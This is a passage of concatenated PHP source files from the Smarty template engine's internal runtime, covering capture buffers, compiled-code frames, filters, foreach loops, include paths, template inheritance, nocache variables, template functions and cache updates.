        throw new SmartyException("Not matching {capture}{/capture} in '{$_template->template_resource}'");
    }

    /**
     * Return content of named capture buffer by key or as array
     *
     * @param \Smarty_Internal_Template $_template
     * @param string|null               $name
     *
     * @return string|string[]|null
     */
    public function getBuffer(Smarty_Internal_Template $_template, $name = null)
    {
        if (isset($name)) {
            return isset($this->namedBuffer[ $name ]) ? $this->namedBuffer[ $name ] : null;
        } else {
            return $this->namedBuffer;
        }
    }

    /**
     * End render callback
     *
     * @param \Smarty_Internal_Template $_template
     *
     * @throws \SmartyException
     */
    public function endRender(Smarty_Internal_Template $_template)
    {
        if ($this->captureCount) {
            $this->error($_template);
        } else {
            $this->captureCount = array_pop($this->countStack);
        }
    }
}
<?php
/**
 * Smarty Internal Extension
 * This file contains the Smarty template extension to create a code frame
 *
 * @package    Smarty
 * @subpackage Template
 * @author     Uwe Tews
 */

/**
 * Class Smarty_Internal_Extension_CodeFrame
 * Create code frame for compiled and cached templates
 */
class Smarty_Internal_Runtime_CodeFrame
{
    /**
     * Create code frame for compiled and cached templates
     *
     * @param Smarty_Internal_Template                   $_template
     * @param string                                     $content   optional template content
     * @param string                                     $functions compiled template function and block code
     * @param bool                                       $cache     flag for cache file
     * @param \Smarty_Internal_TemplateCompilerBase|null $compiler
     *
     * @return string
     */
    public function create(
        Smarty_Internal_Template $_template,
        $content = '',
        $functions = '',
        $cache = false,
        ?Smarty_Internal_TemplateCompilerBase $compiler = null
    ) {
        // build property code
        $properties[ 'version' ] = Smarty::SMARTY_VERSION;
        $properties[ 'unifunc' ] = 'content_' . str_replace(array('.', ','), '_', uniqid('', true));
        if (!$cache) {
            $properties[ 'has_nocache_code' ] = $_template->compiled->has_nocache_code;
            $properties[ 'file_dependency' ] = $_template->compiled->file_dependency;
            $properties[ 'includes' ] = $_template->compiled->includes;
        } else {
            $properties[ 'has_nocache_code' ] = $_template->cached->has_nocache_code;
            $properties[ 'file_dependency' ] = $_template->cached->file_dependency;
            $properties[ 'cache_lifetime' ] = $_template->cache_lifetime;
        }
        $output = sprintf(
			"<?php\n/* Smarty version %s, created on %s\n  from '%s' */\n\n",
            $properties[ 'version' ],
	        date("Y-m-d H:i:s"),
	        str_replace('*/', '* /', $_template->source->filepath)
        );
        $output .= "/* @var Smarty_Internal_Template \$_smarty_tpl */\n";
        $dec = "\$_smarty_tpl->_decodeProperties(\$_smarty_tpl, " . var_export($properties, true) . ',' .
               ($cache ? 'true' : 'false') . ')';
        $output .= "if ({$dec}) {\n";
        $output .= "function {$properties['unifunc']} (Smarty_Internal_Template \$_smarty_tpl) {\n";
        if (!$cache && !empty($compiler->tpl_function)) {
            $output .= '$_smarty_tpl->smarty->ext->_tplFunction->registerTplFunctions($_smarty_tpl, ';
            $output .= var_export($compiler->tpl_function, true);
            $output .= ");\n";
        }
        if ($cache && isset($_template->smarty->ext->_tplFunction)) {
            $output .= "\$_smarty_tpl->smarty->ext->_tplFunction->registerTplFunctions(\$_smarty_tpl, " .
                       var_export($_template->smarty->ext->_tplFunction->getTplFunction($_template), true) . ");\n";
        }
        $output .= "?>";
        $output .= $content;
        $output .= "<?php }\n?>";
        $output .= $functions;
        $output .= "<?php }\n";
        // remove unneeded PHP tags
        if (preg_match('/\s*\?>[\n]?<\?php\s*/', $output)) {
            $curr_split = preg_split(
                '/\s*\?>[\n]?<\?php\s*/',
                $output
            );
            preg_match_all(
                '/\s*\?>[\n]?<\?php\s*/',
                $output,
                $curr_parts
            );
            $output = '';
            foreach ($curr_split as $idx => $curr_output) {
                $output .= $curr_output;
                if (isset($curr_parts[ 0 ][ $idx ])) {
                    $output .= "\n";
                }
            }
        }
        if (preg_match('/\?>\s*$/', $output)) {
            $curr_split = preg_split(
                '/\?>\s*$/',
                $output
            );
            $output = '';
            foreach ($curr_split as $idx => $curr_output) {
                $output .= $curr_output;
            }
        }
        return $output;
    }
}
<?php
/**
 * Smarty Internal Plugin Filter Handler
 * Smarty filter handler class
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */

/**
 * Class for filter processing
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 */
class Smarty_Internal_Runtime_FilterHandler
{
    /**
     * Run filters over content
     * The filters will be lazy loaded if required
     * class name format: Smarty_FilterType_FilterName
     * plugin filename format: filtertype.filtername.php
     * Smarty2 filter plugins could be used
     *
     * @param string                   $type     the type of filter ('pre','post','output') which shall run
     * @param string                   $content  the content which shall be processed by the filters
     * @param Smarty_Internal_Template $template template object
     *
     * @throws SmartyException
     * @return string                   the filtered content
     */
    public function runFilter($type, $content, Smarty_Internal_Template $template)
    {
        // loop over autoload filters of specified type
        if (!empty($template->smarty->autoload_filters[ $type ])) {
            foreach ((array)$template->smarty->autoload_filters[ $type ] as $name) {
                $plugin_name = "Smarty_{$type}filter_{$name}";
                if (function_exists($plugin_name)) {
                    $callback = $plugin_name;
                } elseif (class_exists($plugin_name, false) && is_callable(array($plugin_name, 'execute'))) {
                    $callback = array($plugin_name, 'execute');
                } elseif ($template->smarty->loadPlugin($plugin_name, false)) {
                    if (function_exists($plugin_name)) {
                        // use loaded Smarty2 style plugin
                        $callback = $plugin_name;
                    } elseif (class_exists($plugin_name, false) && is_callable(array($plugin_name, 'execute'))) {
                        // loaded class of filter plugin
                        $callback = array($plugin_name, 'execute');
                    } else {
                        throw new SmartyException("Auto load {$type}-filter plugin method '{$plugin_name}::execute' not callable");
                    }
                } else {
                    // nothing found, throw exception
                    throw new SmartyException("Unable to auto load {$type}-filter plugin '{$plugin_name}'");
                }
                $content = call_user_func($callback, $content, $template);
            }
        }
        // loop over registered filters of specified type
        if (!empty($template->smarty->registered_filters[ $type ])) {
            foreach ($template->smarty->registered_filters[ $type ] as $key => $name) {
                $content = call_user_func($template->smarty->registered_filters[ $type ][ $key ], $content, $template);
            }
        }
        // return filtered output
        return $content;
    }
}
<?php

/**
 * Foreach Runtime Methods count(), init(), restore()
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Runtime_Foreach
{
    /**
     * Stack of saved variables
     *
     * @var array
     */
    private $stack = array();

    /**
     * Init foreach loop
     *  - save item and key variables, named foreach property data if defined
     *  - init item and key variables, named foreach property data if required
     *  - count total if required
     *
     * @param \Smarty_Internal_Template $tpl
     * @param mixed                     $from       values to loop over
     * @param string                    $item       variable name
     * @param bool                      $needTotal  flag if we need to count values
     * @param null|string               $key        variable name
     * @param null|string               $name       of named foreach
     * @param array                     $properties of named foreach
     *
     * @return mixed $from
     */
    public function init(
        Smarty_Internal_Template $tpl,
        $from,
        $item,
        $needTotal = false,
        $key = null,
        $name = null,
        $properties = array()
    ) {
        $needTotal = $needTotal || isset($properties[ 'total' ]);
        $saveVars = array();
        $total = null;
        if (!is_array($from)) {
            if (is_object($from)) {
                if ($needTotal) {
                    $total = $this->count($from);
                }
            } else {
                settype($from, 'array');
            }
        }
        if (!isset($total)) {
            $total = empty($from) ? 0 : ($needTotal ? count($from) : 1);
        }
        if (isset($tpl->tpl_vars[ $item ])) {
            $saveVars[ 'item' ] = array(
                $item,
                $tpl->tpl_vars[ $item ]
            );
        }
        $tpl->tpl_vars[ $item ] = new Smarty_Variable(null, $tpl->isRenderingCache);
        if ($total === 0) {
            $from = null;
        } else {
            if ($key) {
                if (isset($tpl->tpl_vars[ $key ])) {
                    $saveVars[ 'key' ] = array(
                        $key,
                        $tpl->tpl_vars[ $key ]
                    );
                }
                $tpl->tpl_vars[ $key ] = new Smarty_Variable(null, $tpl->isRenderingCache);
            }
        }
        if ($needTotal) {
            $tpl->tpl_vars[ $item ]->total = $total;
        }
        if ($name) {
            $namedVar = "__smarty_foreach_{$name}";
            if (isset($tpl->tpl_vars[ $namedVar ])) {
                $saveVars[ 'named' ] = array(
                    $namedVar,
                    $tpl->tpl_vars[ $namedVar ]
                );
            }
            $namedProp = array();
            if (isset($properties[ 'total' ])) {
                $namedProp[ 'total' ] = $total;
            }
            if (isset($properties[ 'iteration' ])) {
                $namedProp[ 'iteration' ] = 0;
            }
            if (isset($properties[ 'index' ])) {
                $namedProp[ 'index' ] = -1;
            }
            if (isset($properties[ 'show' ])) {
                $namedProp[ 'show' ] = ($total > 0);
            }
            $tpl->tpl_vars[ $namedVar ] = new Smarty_Variable($namedProp);
        }
        $this->stack[] = $saveVars;
        return $from;
    }

    /**
     * [util function] counts an array, arrayAccess/traversable or PDOStatement object
     *
     * @param mixed $value
     *
     * @return int   the count for arrays and objects that implement countable, 1 for other objects that don't, and 0
     *               for empty elements
     */
    public function count($value)
    {
        if ($value instanceof IteratorAggregate) {
            // Note: getIterator() returns a Traversable, not an Iterator
            // thus rewind() and valid() methods may not be present
            return iterator_count($value->getIterator());
        } elseif ($value instanceof Iterator) {
            return $value instanceof Generator ? 1 : iterator_count($value);
        } elseif ($value instanceof Countable) {
            return count($value);
        } elseif ($value instanceof PDOStatement) {
            return $value->rowCount();
        } elseif ($value instanceof Traversable) {
            return iterator_count($value);
        }
        return count((array)$value);
    }

    /**
     * Restore saved variables
     *
     * will be called by {break n} or {continue n} for the required number of levels
     *
     * @param \Smarty_Internal_Template $tpl
     * @param int                       $levels number of levels
     */
    public function restore(Smarty_Internal_Template $tpl, $levels = 1)
    {
        while ($levels) {
            $saveVars = array_pop($this->stack);
            if (!empty($saveVars)) {
                if (isset($saveVars[ 'item' ])) {
                    $item = &$saveVars[ 'item' ];
                    $tpl->tpl_vars[ $item[ 0 ] ]->value = $item[ 1 ]->value;
                }
                if (isset($saveVars[ 'key' ])) {
                    $tpl->tpl_vars[ $saveVars[ 'key' ][ 0 ] ] = $saveVars[ 'key' ][ 1 ];
                }
                if (isset($saveVars[ 'named' ])) {
                    $tpl->tpl_vars[ $saveVars[ 'named' ][ 0 ] ] = $saveVars[ 'named' ][ 1 ];
                }
            }
            $levels--;
        }
    }
}
<?php
/**
 * Smarty read include path plugin
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Monte Ohrt
 */

/**
 * Smarty Internal Read Include Path Class
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 */
class Smarty_Internal_Runtime_GetIncludePath
{
    /**
     * include path cache
     *
     * @var string
     */
    public $_include_path = '';

    /**
     * include path directory cache
     *
     * @var array
     */
    public $_include_dirs = array();

    /**
     * include path directory cache
     *
     * @var array
     */
    public $_user_dirs = array();

    /**
     * stream cache
     *
     * @var string[][]
     */
    public $isFile = array();

    /**
     * stream cache
     *
     * @var string[]
     */
    public $isPath = array();

    /**
     * stream cache
     *
     * @var int[]
     */
    public $number = array();

    /**
     * status cache
     *
     * @var bool
     */
    public $_has_stream_include = null;

    /**
     * Number for array index
     *
     * @var int
     */
    public $counter = 0;

    /**
     * Check if include path was updated
     *
     * @param \Smarty $smarty
     *
     * @return bool
     */
    public function isNewIncludePath(Smarty $smarty)
    {
        $_i_path = get_include_path();
        if ($this->_include_path !== $_i_path) {
            $this->_include_dirs = array();
            $this->_include_path = $_i_path;
            $_dirs = (array)explode(PATH_SEPARATOR, $_i_path);
            foreach ($_dirs as $_path) {
                if (is_dir($_path)) {
                    $this->_include_dirs[] = $smarty->_realpath($_path . DIRECTORY_SEPARATOR, true);
                }
            }
            return true;
        }
        return false;
    }

    /**
     * return array with include path directories
     *
     * @param \Smarty $smarty
     *
     * @return array
     */
    public function getIncludePathDirs(Smarty $smarty)
    {
        $this->isNewIncludePath($smarty);
        return $this->_include_dirs;
    }

    /**
     * Return full file path from PHP include_path
     *
     * @param string[] $dirs
     * @param string   $file
     * @param \Smarty  $smarty
     *
     * @return bool|string full filepath or false
     */
    public function getIncludePath($dirs, $file, Smarty $smarty)
    {
        //if (!(isset($this->_has_stream_include) ? $this->_has_stream_include : $this->_has_stream_include = false)) {
        if (!(isset($this->_has_stream_include) ? $this->_has_stream_include :
            $this->_has_stream_include = function_exists('stream_resolve_include_path'))
        ) {
            $this->isNewIncludePath($smarty);
        }
        // try PHP include_path
        foreach ($dirs as $dir) {
            $dir_n = isset($this->number[ $dir ]) ? $this->number[ $dir ] : $this->number[ $dir ] = $this->counter++;
            if (isset($this->isFile[ $dir_n ][ $file ])) {
                if ($this->isFile[ $dir_n ][ $file ]) {
                    return $this->isFile[ $dir_n ][ $file ];
                } else {
                    continue;
                }
            }
            if (isset($this->_user_dirs[ $dir_n ])) {
                if (false === $this->_user_dirs[ $dir_n ]) {
                    continue;
                } else {
                    $dir = $this->_user_dirs[ $dir_n ];
                }
            } else {
                if ($dir[ 0 ] === '/' || $dir[ 1 ] === ':') {
                    $dir = str_ireplace(getcwd(), '.', $dir);
                    if ($dir[ 0 ] === '/' || $dir[ 1 ] === ':') {
                        $this->_user_dirs[ $dir_n ] = false;
                        continue;
                    }
                }
                $dir = substr($dir, 2);
                $this->_user_dirs[ $dir_n ] = $dir;
            }
            if ($this->_has_stream_include) {
                $path = stream_resolve_include_path($dir . (isset($file) ? $file : ''));
                if ($path) {
                    return $this->isFile[ $dir_n ][ $file ] = $path;
                }
            } else {
                foreach ($this->_include_dirs as $key => $_i_path) {
                    $path = isset($this->isPath[ $key ][ $dir_n ]) ? $this->isPath[ $key ][ $dir_n ] :
                        $this->isPath[ $key ][ $dir_n ] = is_dir($_dir_path = $_i_path . $dir) ? $_dir_path : false;
                    if ($path === false) {
                        continue;
                    }
                    if (isset($file)) {
                        $_file = $this->isFile[ $dir_n ][ $file ] = (is_file($path . $file)) ? $path . $file : false;
                        if ($_file) {
                            return $_file;
                        }
                    } else {
                        // no file was given return directory path
                        return $path;
                    }
                }
            }
        }
        return false;
    }
}
<?php

/**
 * Inheritance Runtime Methods processBlock, endChild, init
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 **/
class Smarty_Internal_Runtime_Inheritance
{
    /**
     * State machine
     * - 0 idle next extends will create a new inheritance tree
     * - 1 processing child template
     * - 2 wait for next inheritance template
     * - 3 assume parent template, if child will loaded goto state 1
     *     a call to a sub template resets the state to 0
     *
     * @var int
     */
    public $state = 0;

    /**
     * Array of root child {block} objects
     *
     * @var Smarty_Internal_Block[]
     */
    public $childRoot = array();

    /**
     * inheritance template nesting level
     *
     * @var int
     */
    public $inheritanceLevel = 0;

    /**
     * inheritance template index
     *
     * @var int
     */
    public $tplIndex = -1;

    /**
     * Array of template source objects
     *
     * @var Smarty_Template_Source[]
     */
    public $sources = array();

    /**
     * Stack of source objects while executing block code
     *
     * @var Smarty_Template_Source[]
     */
    public $sourceStack = array();

    /**
     * Initialize inheritance
     *
     * @param \Smarty_Internal_Template $tpl        template object of caller
     * @param bool                      $initChild  if true init for child template
     * @param array                     $blockNames outer level block name
     */
    public function init(Smarty_Internal_Template $tpl, $initChild, $blockNames = array())
    {
        // if called while executing parent template it must be a sub-template with new inheritance root
        if ($initChild && $this->state === 3 && (strpos($tpl->template_resource, 'extendsall') === false)) {
            $tpl->inheritance = new Smarty_Internal_Runtime_Inheritance();
            $tpl->inheritance->init($tpl, $initChild, $blockNames);
            return;
        }
        ++$this->tplIndex;
        $this->sources[ $this->tplIndex ] = $tpl->source;
        // start of child sub template(s)
        if ($initChild) {
            $this->state = 1;
            if (!$this->inheritanceLevel) {
                //grab any output of child templates
                ob_start();
            }
            ++$this->inheritanceLevel;
            //           $tpl->startRenderCallbacks[ 'inheritance' ] = array($this, 'subTemplateStart');
            //           $tpl->endRenderCallbacks[ 'inheritance' ] = array($this, 'subTemplateEnd');
        }
        // if state was waiting for parent change state to parent
        if ($this->state === 2) {
            $this->state = 3;
        }
    }

    /**
     * End of child template(s)
     * - if outer level is reached flush output buffer and switch to wait for parent template state
     *
     * @param \Smarty_Internal_Template $tpl
     * @param null|string               $template optional name of inheritance parent template
     * @param null|string               $uid      uid of inline template
     * @param null|string               $func     function call name of inline template
     *
     * @throws \Exception
     * @throws \SmartyException
     */
    public function endChild(Smarty_Internal_Template $tpl, $template = null, $uid = null, $func = null)
    {
        --$this->inheritanceLevel;
        if (!$this->inheritanceLevel) {
            ob_end_clean();
            $this->state = 2;
        }
        if (isset($template) && (($tpl->parent->_isTplObj() && $tpl->parent->source->type !== 'extends')
                                 || $tpl->smarty->extends_recursion)
        ) {
            $tpl->_subTemplateRender(
                $template,
                $tpl->cache_id,
                $tpl->compile_id,
                $tpl->caching ? 9999 : 0,
                $tpl->cache_lifetime,
                array(),
                2,
                false,
                $uid,
                $func
            );
        }
    }

    /**
     * Smarty_Internal_Block constructor.
     * - if outer level {block} of child template ($state === 1) save it as child root block
     * - otherwise process inheritance and render
     *
     * @param \Smarty_Internal_Template $tpl
     * @param                           $className
     * @param string                    $name
     * @param int|null                  $tplIndex index of outer level {block} if nested
     *
     * @throws \SmartyException
     */
    public function instanceBlock(Smarty_Internal_Template $tpl, $className, $name, $tplIndex = null)
    {
        $block = new $className($name, isset($tplIndex) ? $tplIndex : $this->tplIndex);
        if (isset($this->childRoot[ $name ])) {
            $block->child = $this->childRoot[ $name ];
        }
        if ($this->state === 1) {
            $this->childRoot[ $name ] = $block;
            return;
        }
        // make sure we got child block of child template of current block
        while ($block->child && $block->child->child && $block->tplIndex <= $block->child->tplIndex) {
            $block->child = $block->child->child;
        }
        $this->process($tpl, $block);
    }

    /**
     * Goto child block or render this
     *
     * @param \Smarty_Internal_Template   $tpl
     * @param \Smarty_Internal_Block      $block
     * @param \Smarty_Internal_Block|null $parent
     *
     * @throws \SmartyException
     */
    public function process(
        Smarty_Internal_Template $tpl,
        Smarty_Internal_Block $block,
        ?Smarty_Internal_Block $parent = null
    ) {
        if ($block->hide && !isset($block->child)) {
            return;
        }
        if (isset($block->child) && $block->child->hide && !isset($block->child->child)) {
            $block->child = null;
        }
        $block->parent = $parent;
        if ($block->append && !$block->prepend && isset($parent)) {
            $this->callParent($tpl, $block, '\'{block append}\'');
        }
        if ($block->callsChild || !isset($block->child) || ($block->child->hide && !isset($block->child->child))) {
            $this->callBlock($block, $tpl);
        } else {
            $this->process($tpl, $block->child, $block);
        }
        if ($block->prepend && isset($parent)) {
            $this->callParent($tpl, $block, '{block prepend}');
            if ($block->append) {
                if ($block->callsChild || !isset($block->child)
                    || ($block->child->hide && !isset($block->child->child))
                ) {
                    $this->callBlock($block, $tpl);
                } else {
                    $this->process($tpl, $block->child, $block);
                }
            }
        }
        $block->parent = null;
    }

    /**
     * Render child on \$smarty.block.child
     *
     * @param \Smarty_Internal_Template $tpl
     * @param \Smarty_Internal_Block    $block
     *
     * @return null|string block content
     * @throws \SmartyException
     */
    public function callChild(Smarty_Internal_Template $tpl, Smarty_Internal_Block $block)
    {
        if (isset($block->child)) {
            $this->process($tpl, $block->child, $block);
        }
    }

    /**
     * Render parent block on \$smarty.block.parent or {block append/prepend}
     *
     * @param \Smarty_Internal_Template $tpl
     * @param \Smarty_Internal_Block    $block
     * @param string                    $tag
     *
     * @return null|string  block content
     * @throws \SmartyException
     */
    public function callParent(Smarty_Internal_Template $tpl, Smarty_Internal_Block $block, $tag)
    {
        if (isset($block->parent)) {
            $this->callBlock($block->parent, $tpl);
        } else {
            throw new SmartyException("inheritance: illegal '{$tag}' used in child template '{$tpl->inheritance->sources[$block->tplIndex]->filepath}' block '{$block->name}'");
        }
    }

    /**
     * render block
     *
     * @param \Smarty_Internal_Block    $block
     * @param \Smarty_Internal_Template $tpl
     */
    public function callBlock(Smarty_Internal_Block $block, Smarty_Internal_Template $tpl)
    {
        $this->sourceStack[] = $tpl->source;
        $tpl->source = $this->sources[ $block->tplIndex ];
        $block->callBlock($tpl);
        $tpl->source = array_pop($this->sourceStack);
    }
}
<?php

/**
 * {make_nocache} Runtime Methods save(), store()
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Runtime_Make_Nocache
{
    /**
     * Save current variable value while rendering compiled template and inject nocache code to
     * assign variable value in cahed template
     *
     * @param \Smarty_Internal_Template $tpl
     * @param string                    $var variable name
     *
     * @throws \SmartyException
     */
    public function save(Smarty_Internal_Template $tpl, $var)
    {
        if (isset($tpl->tpl_vars[ $var ])) {
            $export =
                preg_replace('/^\\\\?Smarty_Variable::__set_state[(]|[)]$/', '', var_export($tpl->tpl_vars[ $var ], true));
            if (preg_match('/(\w+)::__set_state/', $export, $match)) {
                throw new SmartyException("{make_nocache \${$var}} in template '{$tpl->source->name}': variable does contain object '{$match[1]}' not implementing method '__set_state'");
            }
            echo "/*%%SmartyNocache:{$tpl->compiled->nocache_hash}%%*/<?php " .
                 addcslashes("\$_smarty_tpl->smarty->ext->_make_nocache->store(\$_smarty_tpl, '{$var}', ", '\\') .
                 $export . ");?>\n/*/%%SmartyNocache:{$tpl->compiled->nocache_hash}%%*/";
        }
    }

    /**
     * Store variable value saved while rendering compiled template in cached template context
     *
     * @param \Smarty_Internal_Template $tpl
     * @param string                    $var variable name
     * @param array                     $properties
     */
    public function store(Smarty_Internal_Template $tpl, $var, $properties)
    {
        // do not overwrite existing nocache variables
        if (!isset($tpl->tpl_vars[ $var ]) || !$tpl->tpl_vars[ $var ]->nocache) {
            $newVar = new Smarty_Variable();
            unset($properties[ 'nocache' ]);
            foreach ($properties as $k => $v) {
                $newVar->$k = $v;
            }
            $tpl->tpl_vars[ $var ] = $newVar;
        }
    }
}
<?php

/**
 * TplFunction Runtime Methods callTemplateFunction
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 **/
class Smarty_Internal_Runtime_TplFunction
{
    /**
     * Call template function
     *
     * @param \Smarty_Internal_Template $tpl     template object
     * @param string                    $name    template function name
     * @param array                     $params  parameter array
     * @param bool                      $nocache true if called nocache
     *
     * @throws \SmartyException
     */
    public function callTemplateFunction(Smarty_Internal_Template $tpl, $name, $params, $nocache)
    {
        $funcParam = isset($tpl->tplFunctions[ $name ]) ? $tpl->tplFunctions[ $name ] :
            (isset($tpl->smarty->tplFunctions[ $name ]) ? $tpl->smarty->tplFunctions[ $name ] : null);
        if (isset($funcParam)) {
            if (!$tpl->caching || ($tpl->caching && $nocache)) {
                $function = $funcParam[ 'call_name' ];
            } else {
                if (isset($funcParam[ 'call_name_caching' ])) {
                    $function = $funcParam[ 'call_name_caching' ];
                } else {
                    $function = $funcParam[ 'call_name' ];
                }
            }
            if (function_exists($function)) {
                $this->saveTemplateVariables($tpl, $name);
                $function($tpl, $params);
                $this->restoreTemplateVariables($tpl, $name);
                return;
            }
            // try to load template function dynamically
            if ($this->addTplFuncToCache($tpl, $name, $function)) {
                $this->saveTemplateVariables($tpl, $name);
                $function($tpl, $params);
                $this->restoreTemplateVariables($tpl, $name);
                return;
            }
        }
        throw new SmartyException("Unable to find template function '{$name}'");
    }

    /**
     * Register template functions defined by template
     *
     * @param \Smarty|\Smarty_Internal_Template|\Smarty_Internal_TemplateBase $obj
     * @param array                                                           $tplFunctions source information array of
     *                                                                                      template functions defined
     *                                                                                      in template
     * @param bool                                                            $override     if true replace existing
     *                                                                                      functions with same name
     */
    public function registerTplFunctions(Smarty_Internal_TemplateBase $obj, $tplFunctions, $override = true)
    {
        $obj->tplFunctions =
            $override ? array_merge($obj->tplFunctions, $tplFunctions) : array_merge($tplFunctions, $obj->tplFunctions);
        // make sure that the template functions are known in parent templates
        if ($obj->_isSubTpl()) {
            $obj->smarty->ext->_tplFunction->registerTplFunctions($obj->parent, $tplFunctions, false);
        } else {
            $obj->smarty->tplFunctions = $override ? array_merge($obj->smarty->tplFunctions, $tplFunctions) :
                array_merge($tplFunctions, $obj->smarty->tplFunctions);
        }
    }

    /**
     * Return source parameter array for single or all template functions
     *
     * @param \Smarty_Internal_Template $tpl  template object
     * @param null|string               $name template function name
     *
     * @return array|bool|mixed
     */
    public function getTplFunction(Smarty_Internal_Template $tpl, $name = null)
    {
        if (isset($name)) {
            return isset($tpl->tplFunctions[ $name ]) ? $tpl->tplFunctions[ $name ] :
                (isset($tpl->smarty->tplFunctions[ $name ]) ? $tpl->smarty->tplFunctions[ $name ] : false);
        } else {
            return empty($tpl->tplFunctions) ? $tpl->smarty->tplFunctions : $tpl->tplFunctions;
        }
    }

    /**
     * Add template function to cache file for nocache calls
     *
     * @param Smarty_Internal_Template $tpl
     * @param string                   $_name     template function name
     * @param string                   $_function PHP function name
     *
     * @return bool
     */
    public function addTplFuncToCache(Smarty_Internal_Template $tpl, $_name, $_function)
    {
        $funcParam = $tpl->tplFunctions[ $_name ];
        if (is_file($funcParam[ 'compiled_filepath' ])) {
            // read compiled file
            $code = file_get_contents($funcParam[ 'compiled_filepath' ]);
            // grab template function
            if (preg_match("/\/\* {$_function} \*\/([\S\s]*?)\/\*\/ {$_function} \*\//", $code, $match)) {
                // grab source info from file dependency
                preg_match("/\s*'{$funcParam['uid']}'([\S\s]*?)\),/", $code, $match1);
                unset($code);
                // make PHP function known
                eval($match[ 0 ]);
                if (function_exists($_function)) {
                    // search cache file template
                    $tplPtr = $tpl;
                    while (!isset($tplPtr->cached) && isset($tplPtr->parent)) {
                        $tplPtr = $tplPtr->parent;
                    }
                    // add template function code to cache file
                    if (isset($tplPtr->cached)) {
                        $content = $tplPtr->cached->read($tplPtr);
                        if ($content) {
                            // check if we must update file dependency
                            if (!preg_match("/'{$funcParam['uid']}'(.*?)'nocache_hash'/", $content, $match2)) {
                                $content = preg_replace("/('file_dependency'(.*?)\()/", "\\1{$match1[0]}", $content);
                            }
                            $tplPtr->smarty->ext->_updateCache->write(
                                $tplPtr,
                                preg_replace('/\s*\?>\s*$/', "\n", $content) .
                                "\n" . preg_replace(
                                    array(
                                        '/^\s*<\?php\s+/',
                                        '/\s*\?>\s*$/',
                                    ),
                                    "\n",
                                    $match[ 0 ]
                                )
                            );
                        }
                    }
                    return true;
                }
            }
        }
        return false;
    }

    /**
     * Save current template variables on stack
     *
     * @param \Smarty_Internal_Template $tpl
     * @param string                    $name stack name
     */
    public function saveTemplateVariables(Smarty_Internal_Template $tpl, $name)
    {
        $tpl->_cache[ 'varStack' ][] =
            array('tpl' => $tpl->tpl_vars, 'config' => $tpl->config_vars, 'name' => "_tplFunction_{$name}");
    }

    /**
     * Restore saved variables into template objects
     *
     * @param \Smarty_Internal_Template $tpl
     * @param string                    $name stack name
     */
    public function restoreTemplateVariables(Smarty_Internal_Template $tpl, $name)
    {
        if (isset($tpl->_cache[ 'varStack' ])) {
            $vars = array_pop($tpl->_cache[ 'varStack' ]);
            $tpl->tpl_vars = $vars[ 'tpl' ];
            $tpl->config_vars = $vars[ 'config' ];
        }
    }
}
<?php

/**
 * Inline Runtime Methods render, setSourceByUid, setupSubTemplate
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 **/
class Smarty_Internal_Runtime_UpdateCache
{
    /**
     * check client side cache
     *
     * @param \Smarty_Template_Cached  $cached
     * @param Smarty_Internal_Template $_template
     * @param string                   $content
     */
    public function cacheModifiedCheck(Smarty_Template_Cached $cached, Smarty_Internal_Template $_template, $content)
    {
    }

    /**
     * Cache was invalid , so render from compiled and write to cache
     *
     * @param \Smarty_Template_Cached   $cached
     * @param \Smarty_Internal_Template $_template
     * @param                           $no_output_filter
     *
     * @throws \Exception
     */
    public function updateCache(Smarty_Template_Cached $cached, Smarty_Internal_Template $_template, $no_output_filter)
    {
        ob_start();
        if (!isset($_template->compiled)) {
            $_template->loadCompiled();
        }
        $_template->compiled->render($_template);
        if ($_template->smarty->debugging) {
            $_template->smarty->_debug->start_cache($_template);
        }
        $this->removeNoCacheHash($cached, $_template, $no_output_filter);
        $compile_check = (int)$_template->compile_check;
        $_template->compile_check = Smarty::COMPILECHECK_OFF;
        if ($_template->_isSubTpl()) {
            $_template->compiled->unifunc = $_template->parent->compiled->unifunc;
        }
        if (!$_template->cached->processed) {
            $_template->cached->process($_template, true);
        }
        $_template->compile_check = $compile_check;
        $cached->getRenderedTemplateCode($_template);
        if ($_template->smarty->debugging) {
            $_template->smarty->_debug->end_cache($_template);
        }
    }

    /**
     * Sanitize content and write it to cache resource
     *
     * @param \Smarty_Template_Cached  $cached
     * @param Smarty_Internal_Template $_template
     * @param bool                     $no_output_filter
     *
     * @throws \SmartyException
     */
    public function removeNoCacheHash(
        Smarty_Template_Cached $cached,
        Smarty_Internal_Template $_template,
        $no_output_filter
    ) {
        $php_pattern = '/(<%|%>|<\?php|<\?|\?>|<script\s+language\s*=\s*[\"\']?\s*php\s*[\"\']?\s*>)/';
        $content = ob_get_clean();
        $hash_array = $cached->hashes;
        $hash_array[ $_template->compiled->nocache_hash ] = true;
        $hash_array = array_keys($hash_array);
        $nocache_hash = '(' . implode('|', $hash_array) . ')';
        $_template->cached->has_nocache_code = false;
        // get text between non-cached items
        $cache_split =
            preg_split(
                "!/\*%%SmartyNocache:{$nocache_hash}%%\*\/(.+?)/\*/%%SmartyNocache:{$nocache_hash}%%\*/!s",
                $content
            );
        // get non-cached items
        preg_match_all(
            "!/\*%%SmartyNocache:{$nocache_hash}%%\*\/(.+?)/\*/%%SmartyNocache:{$nocache_hash}%%\*/!s",
            $content,
            $cache_parts
        );
        $content = '';
        // loop over items, stitch back together
        foreach ($cache_split as $curr_idx => $curr_split) {
            if (preg_match($php_pattern, $curr_split)) {
                // escape PHP tags in template content
                $php_split = preg_split(
                    $php_pattern,
                    $curr_split
                );
                preg_match_all(
                    $php_pattern,
                    $curr_split,
                    $php_parts
                );
                foreach ($php_split as $idx_php => $curr_php) {
                    $content .= $curr_php;
                    if (isset($php_parts[ 0 ][ $idx_php ])) {
                        $content .= "<?php echo '{$php_parts[ 1 ][ $idx_php ]}'; ?>\n";
                    }
                }
            } else {
                $content .= $curr_split;
            }
            if (isset($cache_parts[ 0 ][ $curr_idx ])) {
                $_template->cached->has_nocache_code = true;
                $content .= $cache_parts[ 2 ][ $curr_idx ];
            }
        }
